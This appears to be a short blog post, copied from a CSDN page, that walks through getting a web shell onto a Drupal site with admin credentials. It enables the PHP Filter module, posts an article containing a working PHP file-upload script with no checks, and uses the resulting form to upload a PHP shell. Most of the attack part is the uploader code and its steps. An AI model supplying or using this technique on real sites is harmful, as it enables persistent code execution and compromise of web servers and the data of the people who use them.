Drupal - upload shell with admin privilege

  1. login drupal with admin username and password.
  2. enable PHP Filter
  3. Add content with PHP Code
    $filedir = ""; 
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];

    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

    echo"<center><b>Done ==> $userfile_name</b></center>";
echo'<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>'; }?>

Enable PHP Filter (Modules Settings), and save it.

Enable PHP Filter

Add a new article with PHP Code format, and POST it.

Add content with PHP Code

Go to Drupal home page, and you can find upload page.

PHP Code Executes

Upload your php shell.

PHP Shell

©️2020 CSDN 皮肤主题: 编程工作室 设计师:CSDN官方博客 返回首页